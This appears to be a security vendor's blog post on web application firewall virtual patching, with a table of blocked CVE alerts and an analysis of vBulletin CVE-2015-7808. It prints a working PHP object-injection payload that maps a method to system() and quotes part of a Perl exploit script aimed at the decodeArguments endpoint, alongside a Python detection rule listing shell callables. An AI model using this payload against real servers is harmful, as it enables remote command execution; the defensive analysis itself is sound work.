Virtual patching to the rescue – How SecureSphere WAF is protecting against vulnerabilities

Virtual patching may have had its humble beginnings when IPS devices first reaped its benefits, but today it is even more invaluable in the fight against zero-day attacks on web applications. We are going to take a deeper look at how Imperva SecureSphere WAF virtual patching protects web applications in the real world.

We did an extensive analysis of the CVEs seen in blocked alerts during the first two weeks of December, following each CVE's disclosure and the immediate mitigation that was published for Imperva SecureSphere WAF.

Signature (CVE and description) | Blocked events (sum of count) | Distinct server groups
--- | --- | ---
CVE-2015-5227: WordPress Landing Pages Plugin Remote Command Execution | 1931 | 35
CVE-2015-1398: Magento Shoplift Vulnerability | 1740 | 159
CVE-2015-7808 vBulletin PHP object injection | 1561 | 109
CVE-2015-1635: Microsoft HTTP.sys DoS | 322 | 18
CVE-2015-4455 Gravity Forms WordPress File Upload | 203 | 6
CVE-2015-4455 Aviary Image Editor file upload | 203 | 6
CVE-2015-2825: WordPress Simple Ads Manager plugin File Upload | 146 | 15
MS15-034/CVE-2015-1635 Attacking Windows Webservers | 92 | 10
MS15-034/CVE-2015-1635 Attacking Windows Webservers 2 | 92 | 10
CVE-2015-4133: ReFlex Gallery WordPress plugin File Upload | 86 | 16
CVE-2015-2208: phpMoAdmin Remote Command Execution | 37 | 13
CVE-2015-5461: WordPress StageShow Open Redirect | 24 | 6
CVE-2015-1635: Microsoft HTTP.sys DoS_user_defined | 14 | 1
CVE-2015-1635: Microsoft HTTP.sys DoS – SOC | 14 | 1
CVE-2015-4852: Apache Commons and Oracle WebLogic Remote Command Execution – 5 | 9 | 1
CVE-2015-4852 Deserialization vulnerability 8 | 9 | 1
CVE-2015-4134: phpwind Open Redirect | 7 | 1
CVE-2015-4553: DedeCMS Unrestricted File Upload – 1 | 4 | 1
CVE-2015-6914: SiteFactory CMS Absolute Path Traversal-2 | 3 | 1
Malformed URL rketing-treng/2015-top-digital-marketing-trends-infographic-recap/ | 2 | 1
CVE-2015-1587: Maarch File Upload | 2 | 1
CVE-2015-4852 Deserialization vulnerability smd.jsp 1 Detection Only | 2 | 2
CVE-2015-5471: WordPress Swim Team Plugin Path Traversal | 1 | 1
CVE-2015-5609: WordPress Image Export Plugin Path Traversal | 1 | 1
Grand Total | 6505 | 416

CVE-2015-5227 (row 1) is a WordPress remote code execution vulnerability that attackers tried to exploit and were clearly blocked by Imperva. In most cases customers also use dynamic profiling and deploy a positive security model, where any anomalous access is automatically blocked even before the ADC content update arrives. The continuous updates from the Imperva ADC ensure immediate protection against such high-profile CVEs.

The more interesting one is CVE-2015-7808, vBulletin PHP object injection, where we first suspected a false positive given the high number of hits and server groups. We put on our detective hats, got our magnifying glasses out and analyzed the payloads from these events further.

The majority of events used the following payload (extracted from our community defense data):

[O:12:"vB_dB_Result":2:{s:5:" * db";O:11:"vB_Database":1:{s:9:"functions";a:1:{s:11:"free_result";s:6:"system";}}s:12:" * recordset";s:20:"echo $((0xfee10000))";}]

It is no accident that this snippet matches the following piece of code from Pastebin. The complete listing can be found at http://pastebin.com/r3PgT4Yh

system(($^O eq 'MSWin32') ? 'cls' : 'clear');
use LWP::UserAgent;
use LWP::Simple;
$ua = LWP::UserAgent->new;
print "\n\t Enter Target [ Example:http://target.com/forum/ ]";
print "\n\n\t Enter Target : ";
$Target=<STDIN>;
chomp($Target);
$response=$ua->get($Target . '/ajax/api/hook/decodeArguments?arguments=O:12:"vB_dB_Result":2:{s:5:"%00*%00db";O:11:"vB_Database":1:{s:9:"functions";a:1:{s:11:"free_result";s:6:"system";}}s:12:"%00*%00recordset";s:20:"echo%20$((0xfee10000))";}');

We can clearly see that the signature string echo $((0xfee10000)) is carried inside an object injection: the serialized vB_Database object maps the free_result function to system, and the echo command is the recordset value handed to it, so the whole argument is unserialized and executed by the vulnerable decodeArguments endpoint.
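As an added example, not Imperva's code or its actual signature, this is the kind of virtual-patch check a WAF applies to the traffic above: URL-decode the parameter (keeping the %00 bytes that mark PHP protected properties such as \0*\0db), block any serialized object sent to the vulnerable decodeArguments endpoint, and, wherever a parameter is sent, block a serialized object whose string values map a hook name onto a shell callable. The endpoint rule, the dangerous-callable list and the request lines are assumptions constructed for the demo.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# Hypothetical virtual-patch rule for the vBulletin decodeArguments endpoint
# (CVE-2015-7808); an assumption for this example, not Imperva's actual signature.
VULN_PATH = re.compile(r"/ajax/api/hook/decodeArguments$")
PHP_OBJECT = re.compile(r'O:\d+:"([^"]*)"')  # serialized object header, e.g. O:11:"vB_Database"
PHP_STRING_PAIR = re.compile(r's:\d+:"([^"]*)";s:\d+:"([^"]*)"')  # e.g. s:11:"free_result";s:6:"system"
DANGEROUS_CALLABLES = {"system", "exec", "shell_exec", "passthru", "popen", "proc_open"}

# Constructed request lines (method + target) for the demo, not real traffic
PAYLOAD = ('O:12:%22vB_dB_Result%22:2:{s:5:%22%00*%00db%22;O:11:%22vB_Database%22:1:'
           '{s:9:%22functions%22;a:1:{s:11:%22free_result%22;s:6:%22system%22;}}'
           's:12:%22%00*%00recordset%22;s:20:%22echo%20$((0xfee10000))%22;}')
SAMPLE_REQUESTS = [
    "GET /forum/ajax/api/hook/decodeArguments?arguments=" + PAYLOAD,
    "GET /forum/ajax/api/hook/decodeArguments?arguments=a:1:{i:0;s:3:%22abc%22;}",
    "GET /forum/showthread.php?t=42&data=" + PAYLOAD,
    "GET /forum/showthread.php?t=42",
]

def decoded_params(request_line):
    """Return (path, {name: [values]}). Splits only on '&' so the ';' inside a serialized
    payload survives, and keeps the NUL bytes (%00) that mark protected properties (\\0*\\0db)."""
    _, _, target = request_line.partition(" ")
    parts = urlsplit(target)
    params = {}
    for pair in parts.query.split("&"):
        if pair:
            name, _, raw = pair.partition("=")
            params.setdefault(unquote_plus(name), []).append(unquote_plus(raw))
    return parts.path, params

def inspect_request(request_line):
    """Return ('block', reason) or ('allow', '') for one request line."""
    path, params = decoded_params(request_line)
    for name, values in params.items():
        for value in values:
            classes = PHP_OBJECT.findall(value)
            # Rule 1 (endpoint virtual patch): decodeArguments is assumed never to
            # legitimately receive a serialized object, so any object there is blocked.
            if classes and VULN_PATH.search(path) and name == "arguments":
                return "block", "CVE-2015-7808: object %s in decodeArguments" % classes[0]
            # Rule 2 (generic object injection): an object whose string values map a
            # hook name onto a shell callable, whatever the parameter or path.
            for key, func in (PHP_STRING_PAIR.findall(value) if classes else ()):
                if func in DANGEROUS_CALLABLES:
                    return "block", "PHP object injection: %s -> %s() in %s" % (key, func, name)
    return "allow", ""
```

Rule 1 is the narrow virtual patch that can ship the day the CVE is published; rule 2 is the broader signature that keeps catching the same object-injection pattern when it is aimed at a different parameter.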

Vulnerabilities always exist in software; what we constantly notice is how quickly the frequency of attacks increases from the moment a CVE is published. The Imperva ADC team works round the clock to keep abreast of vulnerabilities via both official and ad hoc channels and quickly publishes mitigations, taking the severity of each CVE into account. Virtual patching is fundamentally important for containing zero-day attacks because it deploys mitigations quickly without requiring an update to the server software. In this never-ending game of cat and mouse, the Imperva ADC team provides the edge and helps our customers stay protected.